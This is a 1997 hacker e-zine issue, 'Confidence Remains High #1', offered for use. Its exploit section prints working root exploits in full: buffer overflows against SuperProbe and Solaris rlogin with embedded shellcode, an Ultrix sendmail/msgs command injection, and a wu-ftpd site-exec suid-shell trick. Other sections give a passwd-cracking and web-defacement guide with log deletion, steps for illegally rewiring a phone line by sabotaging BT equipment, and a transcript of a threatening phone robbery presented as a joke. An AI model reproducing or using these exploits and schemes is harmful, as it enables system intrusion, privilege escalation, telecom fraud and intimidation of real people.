|
Confidence Remains High #1 - CodeZero Magazine
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
ten:~$ cat CRH001.TXT
???????????????????????????????????????????????????????????????????????????????
===============================================================================
=--------------------=====================================--------------------=
=--------------------= Status : Confidence Remains High. =--------------------=
=--------------------= Issue : 001. =--------------------=
=--------------------= Date : April 16th 1997. =--------------------=
=--------------------=====================================--------------------=
===============================================================================
==================> http://www.codez.com UP FUCKEN NOW!@# <==================
===============================================================================
???????????????????????????????????????????????????????????????????????????????
.:. Site Of The Month .:.
???????????????????????????????????????????????????????????????????????????????
-----------------------> http://micros0ft.paranoia.com <-----------------------
???????????????????????????????????????????????????????????????????????????????
In This Issue :
???????????????????????????????????????????????????????????????????????????????
-----=> Section A : Introduction And Cover Story.
1. Welcome To Issue 1 Of Confidence Remains High......: Tetsu Khan
2. sIn eXposed........................................: The CodeZero + Friends
-----=> Section B : Exploits And Code.
1. SuperProbe.........................................: Solar Designer
2. Ultrix Exploit.....................................: StatioN
3. Solaris 2.5 / 2.5.1 rlogin Exploit.................: Jeremy Elson
4. wu-ftpd 2.4(1) Exploit.............................: Eugene Schultz
5. portmsg.c..........................................: Some FTP Someplace..
-----=> Section C : Phones / Scanning / Radio.
1. Fast Food Restuarant Frequencies...................: Dj Gizmo
2. Robbing Stores With Phones, A Real Example.........: The CrackHouse
3. How To Rewire Your House For Free Phone Calls......: WildFire
-----=> Section D : Miscellaneous.
1. Hacking Electrical Items Part 2, The Sequel........: Tetsu Khan
2. Virus Definitions..................................: so1o
3. Fun With whois, sinnerz.com........................: so1o
4. Hacking Space Shuttles, Abort Codes................: NailGun
5. Country Domain Listing.............................: SirLance
-----=> Section E : World News.
1. CoreWars...........................................: so1o / od?phreak
2. Technophoria Want A Piece Of CodeZero Too?.........: so1o
3. Global kOS Press Release...........................: Spidey
4. www.ncaa.com Hack Makes News.......................: so1o
5. CodeZero To Release sunOS 5.x RootKit..............: so1o
6. Too Many nethosting.com Break-Ins..................: so1o
7. sulfur of #hack to print a bi-monthly magazine.....: so1o
8. 2600 Printers go bust and take $9000 with them.....: so1o
------=> Section F : Projects.
1. IP Spoofing Programs And Utilities.................: Dr_Sp00f
2. Using LinuxRootKitIII..............................: suid
-----=> Section G : The End.
???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. Welcome To Issue 1 Of Confidence Remains High : Tetsu Khan
???????????????????????????????????????????????????????????????????????????????
Confidence Remains High will be issued EVERY 50 DAYS as from April 16th...
It is free, not like 2600, or sulfur's soon to be released Access Denied, which
both cost *YOU*, the reader MONEY, cash, $$$ etc. which we don't like, because
information should be free, and so, we bring you Confidence Remains High, with
news, exploits, scanning, telco, and enough shit to make you wonder "why did I
ever pay cash for this?!" anyway, on with the show...
==================> http://www.codez.com UP FUCKEN NOW!@# <==================
==================> http://www.codez.com UP FUCKEN NOW!@# <==================
==================> http://www.codez.com UP FUCKEN NOW!@# <==================
Confidence Remains High is issued every 50 days as from April 16th, as then,
issue 20 will be released on New Years Day 2000 (if we go that far!)
Tetsu Khan.
???????????????????????????????????????????????????????????????????????????????
2. sIn eXposed : CodeZero + Friends.
???????????????????????????????????????????????????????????????????????????????
If you cant be bothered to read all this shit, just go to...
---------------> www.sinnerz.com/bible.htm <---------------
...And view the lameness for yourself :)
-------------------------------------------------------------------------------
Concerning the news in issue 2 of the CodeZero technical journal, we found
this response (http://www.sinnerz.com/codezero.txt) :
So has anyone here heard of Codezero? Its some ezine type shit that i just
wanted to expose as bullshit. I had never heard of it till i talked to
darkfool and he showed me... You can check it out at neonunix.org/codezero.
It is pretty good for a laugh. When me and Banshee and Messiah first read it
we all were in #sin and the first thing to come to our mind was.. wtf is this?
Some hacker gossip column or what? Even more funny was the surprise i got
when i saw that the editor was Tetsu Khan (so1o who was mentioned earlier
in the Bible)... that brought a smile to my face to see that. Anyways so
i was reading thru issue 2 of codezero and i happend to see a lot of bogus
information...stuff said that wasn't true. Same with the first issue.
Examples our comments like "Infected has some new programs coming out soon
including Utopia an encryption program by The Messiah." Anyways im doing
the algorithm for that program with Messiah and it is not going to be out
for a long time... Messiah has a lot of plans for the future all coming
before Utopia does....
Those are the exact, untouched words of HosTi?e of SiN, hmmm, lets examine
that passage more closely...
"some ezine type shit that i just wanted to expose as bullshit..."
"i was reading thru issue 2 of codezero and i happend to see a lot of bogus
information...stuff said that wasn't true..."
This is very interesting indeed, that they should care about a small news
section in the journal isn't it? seeing that we published how many lines about
them? a whole 20 I hear you say? hmm...doesn't the journal have exploits and
other stuff in it to? I think it does...
"Anyways im doing the algorithm for that program with Messiah and it is not
going to be out for a long time... Messiah has a lot of plans for the future
all coming before Utopia does...."
So then HoSti?e, you can program now? thats new, and *YOU* are coding the
algorithm? intersting... WAIT! you are saying that Utopia is true? and that
we did publish correct information? I always thought so, seeing that the truth
is that you probably wanted your beautiful new program to be a big surpise
to the "scene"...
Heh, how silly of me to actually think you had a clue! You just can't take it
that you are stuck in a lame fuck group of wannabes and the truth is finally
coming out...Let us examine more examples found on www.sinnerz.com :
It also had some shit like "4 new hacks were reported this month" and they
were right on the 4 new hacks part but they put bogus shit about them.
The catch22 one they happend to put the html for it.. well they put the
wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the
names of all the SIN members on the page. Which they decided to leave out...
also They put some weird shit which they said was on the 2 hacks Darkfool did.
Where it was the entersin.gif from our page that was there with a bunch of
other links. Anyways there is also a lot of other shit that was bullshit in
both of their issues...
SHoCk HoRRoR !!!! Darkfool was responsible for the www.catch22.com hack ??
and SiN was linked to the hacks too?? That is interesting news HoSTi?e, seeing
you just could have landed one of your SiN members in trouble, as CodeZero
didn't mention any names concerning the catch22.com hack, and the very first
index.html to go up, which was the one we published was infact very correct,
its just that the index.html must have changed how many times that day?
hmmm...
"...wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the
names of all the SIN members on the page. Which they decided to leave out..."
Strange...seeing another hacker, by the name of Sventa, was blamed entirely for
the attacks. Oh yeah, one last thing, in the index.html that was apparently
modified by Darkfool of SiN, there were 8 numbers, we know what they stand for,
SiN doesn't, all will be explained one day, as SiN are cl00less and need a good
kicking.
Let us continue, with a "hacking guide" taken from www.sinnerz.com :
--------------------------------------------------------------------
_________ ___ _______
\~=._ _.=~/ / _____/ | | \ \ \~=._ _.=~/
\ ~=__=~ / \_____ \ | | / | \ \ ~=__=~ /
\_.=~ ~=._/ / \ | |/ | \ \_.=~ ~=._/
_.=~ \ / ~=._ /_______ / |___|\____|__ / .=~ \ / ~=.
L------\------/------7 \/ \/ L------\------/------7
\ / \ /
\ / http://www.sinnerz.com \ /
\/ \/
OK, this is my mini guide to the easiest 'hacking' there is ( I think ) if any
one knows different then mail me and tell me :) .
Most FTP servers have the directory /pub which stores all the 'public'
information for you to download. But along side /pub you will probably find
other directorys such as /bin and /etc its the /etc directory which is
important. In this directory there is normally a file called passwd. .
This looks something like this :-
root:7GHgfHgfhG:1127:20:Superuser
jgibson:7fOsTXF2pA1W2:1128:20:Jim Gibson,,,,,,,:/usr/people/jgibson:/bin/csh
tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh
mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh
mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh
This is where all the user names and passwords are kept. For example, root is
the superuser and the rest are normal users on the site. The bit after the
word root or mcn such as in this example (EUyd5XAAtv2dA) is the password BUT
it is encrypted. So you use a password cracker....which you can d/l from
numerous sites which I will give some URL's to at the end of this document.
With these password crackers you will be asked to supply a passwd. file which
you download from the \etc directory of the FTP server and a dictionary file
which the crackers progam will go through and try to see if it can make any
match. And as many people use simple passwords you can use a 'normal'
dictionary file. But when ppl REALLY don't want you to break their machines
they set their passwords to things such as GHTiCk45 which Random Word
Generator will create (eventually ). Which is where programs such as Random
Word Generator come in. ( Sorry just pluging my software )
BTW the bad news is that new sites NORMALLY have password files which look
like this :-
root:x:0:1:0000-Admin(0000):/:/sbin/sh
The x signifies shadowed - you can't use a cracker to crack it because there's
nothing there to crack, its hidden somewhere else that you can't get to. x is
also represented as a * or sometimes a . Ones like the top example are known
as un-shadowed password files normally found at places with .org domain or .net
and prehaps even .edu sites. (Also cough .nasa.gov cough sites).
If you want a normal dictionary file i recommend you go to
http://www.globalkos.org and download kOS Krack which
has a 3 MEG dictionary file. Then run a .passwd cracking program
such as jack the ripper or hades or killer crack ( I recommend ) against the
.passwd file and dictionary file. Depending upon the amount of passwords in
the .passwd file, the size of the dictionary file and the speed of the processor
it could be a lengthy process.
Eventually once you have cracked a password you need a basic knowledge of unix.
I have included the necassary commands to upload a different index.html file to
a server :-
Connect to a server through ftp prefably going through a few shells to hide your
host and login using the hacked account at the Login: Password: part.
Then once connected type
dir or list
If there's a directory called public_html@ or something similar change
directory using the Simple dos cd command ( cd public_html )
Then type binary to set the mode to binary transfer ( so you can send images
if necassary )
Then type put index.html or whatever the index file is called.
It will then ask which transfer you wish to use, Z-Modem is the best.
Select the file at your end you wish to upload and send it.
Thats it !
If you have root delete any log files too.
Please note that this process varys machine to machine.
To change the password file for the account ( very mean ) login in through
telnet and simply type passwd at the prompt and set the password for the
account to anything you wish.
Thats it....if ya don't understand it read it about 10x if ya still don't
ask someone else i am too busy with errrr stuff..
Links :-
http://www.sinnerz.com Where you got this I hope.
Stay cool and be somebodys fool everyone
Darkfool
darkfool@pancreas.com
http://www.sinnerz.com
---
Ummm, *NEWS FLASH*, lets see shall we, this tells attackers to retrieve the
passwd file using what?! FTP I hear you scream? well, lets see shall we
children, gather 'round...
"Most FTP servers have the directory /pub which stores all the 'public'
information for you to download. But along side /pub you will probably
find other directorys such as /bin and /etc its the /etc directory
which is important. In this directory there is normally a file called
passwd. . This looks something like this :-"
Oh dear, oh dear, oh dear, lets look at the FACTS :
Common FTP passwd path : /home/ftp/etc/passwd
*REAL* passwd path : /etc/passwd
Hmm, lets see, anyone with a clue would know that the FTP passwd file is not
real, it is only there to mislead little wannabes, examples iclude members of
SiN.
We continue...
"Eventually once you have cracked a password you need a basic knowledge of
unix. I have included the necassary commands to upload a different
index.html file to a server :-
Connect to a server through ftp prefably going through a few shells to hide
your host and login using the hacked account at the Login: Password: part.
Then once connected type
dir or list
If there's a directory called public_html@ or something similar change
directory using the Simple dos cd command ( cd public_html )
Then type binary to set the mode to binary transfer ( so you can send images
if necassary )
Then type put index.html or whatever the index file is called.
It will then ask which transfer you wish to use, Z-Modem is the best.
Select the file at your end you wish to upload and send it.
Thats it !"
Okay, so now, SiN defines hacking as downloading the /home/ftp/etc/passwd
which is a decoy, and then proceed to get kOS Krack (last time I checked
www.globalkos.org was down) and then try to crack the passwd file and
finally use FTP to upload an index.html? how imaginative and original, pity
all of this info you have been fed is absolute crap, with a success rate of
practically zero. One last thing...
"If you have root delete any log files too."
Umm, but you havent told all our wannabe hackers that read your shit where the
log files are found, seeing that you have to find them, delete them, then
touch them, oh yeah, I thought you were using FTP? strange...
Im sure that from these examples we have fowarded to you we have started to
prove the truth behind SiN, seeing they are actually quite lame wannabes with
very minimal skills...this has been shown, and we will continue to add to this
hall of shame for SiN, as until now, no-one has stood up to them, but now it
is time for a change. Watch this space my friends, Until next time...
T_K
I wish I was in sIn, I dew I dew! I dew!! sIn is 3r33t!! -- so1o
???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. SuperProbe : Solar Designer
???????????????????????????????????????????????????????????????????????????????
/*
* SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1
* by Solar Designer 1997.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
"\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 8192
#define alignment 0
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize / 2; i += 4)
*(char **)&buffer[i] = get_sp() - 2048;
memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
strcpy(&buffer[bufsize - 256], shellcode);
setenv("SHELLCODE", buffer, 1);
memset(buffer, 'x', 72);
*(char **)&buffer[72] = get_sp() - 6144 - alignment;
buffer[76] = 0;
execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
}
???????????????????????????????????????????????????????????????????????????????
2. Ultrix Exploit : StatioN
???????????????????????????????????????????????????????????????????????????????
This bug has been fixed in OSF, but not in Ultrix.
It should also work on any system that has the msgs mail alias.
$ grep msgs /etc/aliases
msgs: "|/usr/ucb/msgs -s"
Ok, the first thing to do is look in the /usr/msgs directory (or whatever
the directory is where the msgs files are kept), and see what the next msgs
file will be (if there is 1 and 2, then the next one is pretty easy to figure
out).
Then, make an executable /tmp/a that like makes a suid shell (this is pretty
easy to do, if you can't do it, don't consider yourself a hacker).
By default, newsyslog executes every 6 days at 4 am, but it depends on the
setup in crontab. What it does is age the syslog file (at /usr/adm/syslog.1,
.2, ..., i think).
symlink /usr/msgs/<nextmsg> -> /usr/adm/newsyslog
$ telnet
telnet> o localhost 25
mail shit, version, etc
expn msgs
250 <"| /usr/ucb/msgs -s">
mail from: <`/tmp/a`>
rcpt to: msgs
data
doesn't matter what you put here
.
quit
So now, when it writes to /usr/msgs/<nextmsg>, it will overwrite
/usr/adm/newsyslog, and since /usr/adm/newsyslog is a shell script, it will
expand `/tmp/a` by executing /tmp/a AS ROOT, giving you an suid shell or
whatever /tmp/a does.
From there, just clean up after yourself. StatioN
???????????????????????????????????????????????????????????????????????????????
3. Solaris 2.5 / 2.5.1 rlogin Exploit : Jeremy Elson
???????????????????????????????????????????????????????????????????????????????
/*
* rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
* by exploiting the gethostbyname() overflow in rlogin.
*
* gcc -o rlogin-exploit rlogin-exploit.c
*
* Jeremy Elson,
* jeremy.elson@nih.gov
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx\n", targ_addr);
execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
perror("execl failed");
}
???????????????????????????????????????????????????????????????????????????????
4. wu-ftpd 2.4(1) Exploit : Eugene Schultz
???????????????????????????????????????????????????????????????????????????????
This sploit is a teeny bit outdated, but I have been asked by many people about
exploiting FTP recently...
This shows you how to use the wuftp2.4(1) hole to gain root.
------------------------------------------------------------
On the VICTIM system, compile the following C code:
---------------------------------------------------
main()
{
setuid(0);
seteuid(0);
system("cp /bin/sh /tmp/suidroot");
system("chmod a+rwxs /tmp/suidroot");
}
Now create a shell script, called root.sh, that contains the following:
-----------------------------------------------------------------------
exec a.out <----- a.out is the name of the compiled C code
Now, FTP localhost, login as your account on that system and:
-------------------------------------------------------------
ftp> quote site exec sh root.sh
Then quit FTP and execute /tmp/suidroot to become root!
???????????????????????????????????????????????????????????????????????????????
5. portmsg.c : Some FTP Someplace..
???????????????????????????????????????????????????????????????????????????????
/**************************************************************************/
/* portmsg - generate a message on a port, then close connection */
/* */
/* Usage: portmsg file port */
/* */
/* When a telnet client connects to the specified port, the */
/* text from the file will be echoed to the user. After a */
/* short delay the connection will close. */
/* */
/* eg. portmsg /etc/passwd 666 */
/* */
/***************************************************************************/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/file.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/param.h>
#include <signal.h>
#include <sys/wait.h>
wait_on_child()
{
union wait status;
while (wait3(&status, WNOHANG, (struct rusage *) 0) > 0)
;
}
lostconn()
{
exit(1);
}
main(argc, argv)
int argc;
char *argv[];
{
int msgfd, fd, n;
struct stat statBuf;
int port;
char *msg;
int sockfd, newsockfd;
int addrlen; int opt;
struct sockaddr_in tcp_srv_addr;
struct sockaddr_in their_addr;
if (argc != 3) {
fprintf(stderr, "Usage: portmsg file port\n");
exit(1);
}
port = atoi(argv[2]);
if (port == 0) {
fprintf(stderr, "error: bad port number [%s]\n", argv[2]);
exit(1);
}
if ((msgfd = open(argv[1], O_RDONLY)) < 0) {
fprintf(stderr, "error: cannot open message file [%s]\n", argv[1]);
exit(1);
}
/* read the message */
fstat(msgfd, &statBuf);
if (statBuf.st_size <= 0) {
fprintf(stderr, "error: message file [%s] is empty\n", argv[1]);
exit(1);
}
msg = (char *)malloc(statBuf.st_size);
if (read(msgfd, msg, statBuf.st_size) != statBuf.st_size) {
fprintf(stderr, "error: cannot read message file [%s]\n", argv[1]);
exit(1);
}
/* become a daemon */
switch(fork()) {
case -1:
fprintf(stderr, "error: can't fork\n");
exit(1);
case 0:
break;
default:
exit(0);
}
if (setpgrp(0, getpid()) == -1) {
fprintf(stderr, "error: can't change process group\n");
exit(1);
}
if ((fd = open("/dev/tty", O_RDWR)) >= 0) {
ioctl(fd, TIOCNOTTY, NULL);
close(fd);
}
(void)signal(SIGCLD, wait_on_child);
bzero((char *) &tcp_srv_addr, sizeof(tcp_srv_addr));
tcp_srv_addr.sin_family = AF_INET;
tcp_srv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
tcp_srv_addr.sin_port = htons(port);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "can't create stream socket\n");
exit(-1);
}
opt = 1;
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR,
(char *) &opt, sizeof(opt)) < 0) {
perror("setsockopt");
exit(1);
}
if (bind(sockfd, (struct sockaddr *)&tcp_srv_addr,
sizeof(tcp_srv_addr)) < 0) {
fprintf(stderr, "can't bind local address\n");
exit(-1);
}
listen(sockfd, 5);
main_again:
addrlen = sizeof (their_addr);
newsockfd = accept(sockfd, (struct sockaddr *) &their_addr, &addrlen);
if (newsockfd < 0) {
if (errno == EINTR)
goto main_again;
fprintf(stderr, "accept error\n");
exit(-1);
}
switch(fork()) {
case -1:
fprintf(stderr, "server can't fork\n");
exit(-1);
case 0:
dup2(newsockfd, 0);
dup2(newsockfd, 1);
for (n = 3; n < NOFILE; n++)
close(n);
break;
default:
close(newsockfd);
goto main_again;
}
/* daemon child arrives here */
(void)signal(SIGPIPE, lostconn);
(void)signal(SIGCHLD, SIG_IGN);
fprintf(stdout, msg);
(void)fflush(stdout);
sleep(5);
exit(0);
}
???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. Fast Food Restuarant Frequencies : Dj Gizmo
???????????????????????????????????????????????????????????????????????????????
If you got a scanner and or transciever that works with these frequencies, then
you could have some serious phun...
-------------------------------------------------------------------------------
RESTAURANT CUSTOMER (R) CLERK (I) LOCATION
-------------------------------------------------------------------------------
Arby's 30.8400 154.5700 Nationwide
Bess Eaton Donut 457.5375 467.7625 Rhode Island
Big Boy 30.8400 154.5700 UNKNOWN OH area
457.6000 467.8250 UNKNOWN OH area
Burger King 30.8400 154.5700 UNKNOWN OH area
31.0000 170.3050 UNKNOWN GA area
33.4000 154.5400 Frederick, MD
457.5500 467.7750 Baltimore, MD area
457.5625 467.7875 Nationwide
457.5750 467.8000 UNKNOWN area
457.6000 467.8250 UNKNOWN area
460.8875 465.8875 Nationwide
461.5375 UNKNOWN UNKNOWN OH area
Burgerville 30.8400 154.5700 UNKNOWN OH area
Dairy Queen 30.8400 154.5700 UNKNOWN OH area
460.8875 465.8875 UNKNOWN OH area
920.2625 WFM UNKNOWN Halifax, Nova Scotia
Dunkin Donuts 30.8400 154.5700 UNKNOWN NH area
33.1600 154.5150 UNKNOWN NH area
33.4000 154.5400 UNKNOWN NH area
El Mexicano 464.9625 469.9625 Germantown, MD
G.D. Ritzy's 35.1000 UNKNOWN UNKNOWN OH area
Hardee's 30.8400 154.5700 Nationwide
31.0000 170.3050 UNKNOWN NC area
457.5375 467.7625 UNKNOWN OH area
460.8875 465.8875 UNKNOWN OH area
461.0875 466.0875 UNKNOWN OH area
461.1125 466.1125 Aurora, IL area
Jack in the Box 33.4000 154.5400 San Jose, CA
Kenny Rogers Roasters 469.0125 464.0125 Frederick, MD
Chicken
Kentucky Fried Chicken 30.8400 154.5700 Occoquan, VA area
31.0000 170.3050 UNKNOWN MN area
33.1400 151.8950 UNKNOWN OH area
35.0200 154.6000 Frederick, MD
457.5875 467.8125 Vienna, VA area
457.6000 467.8250 UNKNOWN OH area
460.8875 465.8875 Washington, DC area
462.7625 467.8875 Washington, DC area
McDonald's CANADA 30.8400 151.6700 main freq. Canada
30.8400 154.1450 aux. freq. Canada
McDonald's U.S.A. 30.8400 154.5700 San Diego, CA area
31.0000 170.3050 UNKNOWN OH/NC area
33.1400 151.8950 Nationwide
33.1400 170.3050 Southfield, MI area
33.4000 154.5400 Frederick, MD
33.4000 154.5700 UNKNOWN area **
35.0200 151.8950 UNKNOWN area **
35.0200 154.4900 Decatur, IN area
35.0200 154.6000 Nationwide
151.7150 169.4450 Washington, DC area
151.7450 UNKNOWN UNKNOWN OH area
151.7750 171.9050 UNKNOWN OH area
154.5700 170.2450 Nationwide
154.6000 171.1050 Nationwide
155.0000 UNKNOWN UNKNOWN OH area
457.5375 461.0875 UNKNOWN OH area
457.5500 467.7750 UNKNOWN OH area
457.6000 467.8250 UNKNOWN OH area
460.8875 465.8875 UNKNOWN OH area
461.0375 466.0375 UNKNOWN OK/CA area
461.0875 466.0875 UNKNOWN OH area
462.1625 467.1625 UNKNOWN OH area
463.2875 468.2875 UNKNOWN NY area
464.5125 UNKNOWN UNKNOWN OH area
469.0125 464.0125 Germantown, MD
469.1875 464.1875 Frederick, MD
920.5000 WFM 903.5000 WFM Gaithersburg, MD
Rally's 457.5375 468.3875 UNKNOWN OH area
461.0875 466.0875 UNKNOWN OH area
461.5375 462.1625 Holland OH area
Roy Rogers 30.8400 154.5700 Germantown, MD
457.5375 467.7625 Washington, DC area
469.0125 464.0125 Germantown, MD
469.9250 464.9250 Vienna, VA
Taco Bell 30.8400 154.5700 Washington, DC area
33.1600 154.5150 Frederick, MD
33.4000 154.5400 Germantown, MD
460.8875 465.8875 Nationwide
461.0875 466.0875 UNKNOWN OH area
461.5375 UNKNOWN UNKNOWN OH area
464.9625 469.9625 UNKNOWN OH area
469.0125 464.0125 Reston, VA
Wendy's 33.4000 154.5400 Rockville, MD
49.8300 49.8900 UNKNOWN area **
457.5125 467.7375 UNKNOWN OH area
457.5375 467.7625 UNKNOWN OH area
457.6125 467.8375 Washington, DC area
460.8875 465.8875 Nationwide
461.0875 466.0875 UNKNOWN OH area
461.8125 UNKNOWN UNKNOWN OH area
464.3750 UNKNOWN Headquarters
464.5125 UNKNOWN Columbus, OH area
White Castle 457.6000 467.8250 UNKNOWN OH area
461.8125 UNKNOWN Columbus, OH area
- Have Phun!
???????????????????????????????????????????????????????????????????????????????
2. Robbing Stores With Phones, A Real Example : The CrackHouse
???????????????????????????????????????????????????????????????????????????????
the following is a transcript of a teleconference robbery of a
Wawa convience store, all names remain the same to fully implicate the
guilty. the sad thing is this is an actual transcript.
dk: Hello, listen very carefully I'm not going to repeat myself.
manager: Who is this?
dk: Don't worry about that, listen carefully, don't interrupt.
Are you the manager and if so what is your name?
manager: yes, i'm the manager, my names kathy.
dk:ok kathy, look across the street do you see the apartment complex
directly opposite you?
manager: yes.
dk: i have a man stationed in a car in that complex's parking lot.
he has a high powerd assault rifle aimed at the individual behind the
counter. i have another man stationed adjacent to the Wawa with a cellular
phone. what's the individual's name behind the cash register?
manager: her names Lori, please don't hurt anyone.
dk: no ones going to get hurt as long as you shut the fuck up and do
exactly as i say. instruct lori that she is to keep her hands on the
counter at all times, with her palms laid out flat. shes only to move
when she must make change for a customer, do not alert any customers in
the store kathy. do you understand me?
manager: yes i understand, hold on. (kathy then instructs lori)
please promise you won't hurt anyone? please.
dk: no ones getting hurt, now we got 30 seconds kathy from when
i say go, when i say go you grab a plastic bag, fill it with all the money
in the register furthest from the doorway and open the back door and
leave all the money there, then shut and lock the door.
manager: ok ok, do you want the foodstamps?
dk: no! the foodstamps go in a seperate bag.
sulfur: and get me a gatorade.
manager: a gatorade? what kind?
sulfur: if it's not a large im gonna open fire.
manager: ok just please don't hurt anyone.
dk: ok kathy, go! (theres a rustling of bags and some background noise)
manager: ok, done, now what?
dk: kathy have you made any attempt to contact any form of law
enforcement?
manager: no i promise.
sulfur: she's lying.
dk: kathy, do you know what a digital voice analyzer is? (dk is
now completely talking out his ass)
manager: no.
dk: well we have one connected to a polygraph examiner and its
telling us your lying kathy.
manager: i swear to you im not lying!
sulfur: shoot her
dk: kathy your lying.
manager: no no im not!
dk: your lying kathy, mike, open fire open fire!
z: open fire!!
manager: LORI!! DUCK!!
*click*
everyone on the conference call: BAHAHAHAHAHAHAHAHAHA
???????????????????????????????????????????????????????????????????????????????
3. How To Rewire Your House For Free Phone Calls : WildFire
???????????????????????????????????????????????????????????????????????????????
(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)
How To Rewire You House For Free Fone Calls
In The U.K
(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)
By WildFire of AWOL
The aim is to teach you how to rewire your house to an engineer test line
for free Fone calls, you dont need any little coloured boxes etc, all you
need is a bit of patience and a lot of guts =)
EQUIPMENT -:
A B.T line into your house
Socket wrench with 1/2 inch bit
Offical looking enginner clothing (lumi jacket)
C.B radios (Optional)
STEP 1:
We need to find out some information about the your line
(Note : these numbers are not anything to do with your Fone number)
what we need to know is how it runs back to B.T
Eg. The pole outside your house is the first contact then it runs
underground to A big green box, these are called DP's
(Disconection/Connection points)
Fig 1.
House -----> Pole ------> Green box ------> B.T
\/ \/
Prefix = 46 95
The way to find this out is by sabotaging your house's fone line to get an
engininer to pay you a visit . With him he should bring a nice filo-fax with
all his jobs in (all the places he's got to visit and their line info etc.)
You now Have 3 options
(i) KILL HIM!! and steal all his neat stuff *
(ii) Act Intrested in his work and ask how he knows which line
is yours say you want to do work experience in B.T etc/etc
and he might show it to you and even explain it to you.
(iii) Sabotage your line in such a way he's got to go up your
pole , while he's trying to work out what the fuck you've done
have a look at the filo-fax and write down all your info.
* Not Recommended
There are probally other ways to get your info ie. Bullshiting the B.T depot.
or operators but they are not known my me , if anyone has any ideas i'd like
to hear from them...
STEP 2 : Decode
When you have the filo-fax in your hands flick through it, near the end should
be a page with your surname and telephone number..
below this should be the following ..........
PCP E P DP PR
15 15 360 1922 4
What we are concerned with are the DP, PCP and P
DP -- This is the pole, you can check this by going outside and looking
at it .
PCP/E -- This is the big green box have a look around your neighbourhood
not to be confused with cable green boxes !!.
P -- This is where your wire-pair are in the green box.
The other letters are probally what contact your wire-pair is on the pole etc.
Now You're Set To Go On An Adventure ..
Wait until darkness falls , Put on your funky glow in the dark jackets,
put the socket wrench in your pocket and take a visit to your local greener.
Look around for nosey OAP's or other paranoid people. I actually had the
shit kicked out of me by a large bloke who thought I was breaking into
his house because I was looking very suspect walking around the streets
stopping at the end of his road near the green box, ouch!
On the front of the box there should be 2 diamond shaped things, pull out the
wrench and undo them , the box should now open with ease..
You Should see loads of wires going all over the place. On the back of the
left door there should be a white box (like you the one you plug your fone
into back home) this is what the Enginerer uses for calls this is what we are
going to swap with your house pair .
How To Find Your Pair: There should be transparent plastic struts going from
top to bottom, they have holes (where the wires come through) with very
tiny numbers near them.
